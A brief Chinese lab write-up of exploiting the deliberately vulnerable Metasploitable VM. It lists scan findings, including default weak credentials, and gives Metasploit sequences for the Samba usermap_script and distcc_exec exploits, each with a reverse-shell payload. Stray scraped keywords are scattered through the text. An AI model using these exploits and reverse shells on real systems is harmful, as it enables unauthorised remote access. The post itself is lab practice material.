Samba&distcc 漏洞

漏洞测试确实是能够的  当时把文章copy下来进行再进行测试。可是没有copy到图片,实验是成功了,可是没有那么直观。ubuntu

使用metasploit服务器

对metasploitable 靶服务器进行***ide

metasploitable 是ubuntu8.0的版本工具

 

neuss扫描到漏洞测试

139端口能够获取该系统主机名为“METASPLOITABLE”,注释“metasploitable server (Samba 3.0.20-Debian)”;unix

系统存在弱口令,用户user、msfadmin密码与用户名同样,使用net use命令可以创建链接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也能够使用;server

telnet服务开放,可肯定该系统为Ubuntu 8.04,用户user、msfadmin能够登陆,并得到相应权限。若是不存在弱口令,经过截获该telnet数据也能获取用户口令图片

一个distcc漏洞ip

一个samba 共享服务漏洞资源

 

 

msf对靶服务器的工具

smb-samba 共享服务

 

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost (ip address)

set lhost (ip address)

exploit

 

use exploit/unix/misc/distcc_exec

set payload cmd/unix/reverse_perl

set rhost  (ip address)

set lhost  (ip address)

exploit

 

distcc 成功 可是没有root的权限

相关文章
相关标签/搜索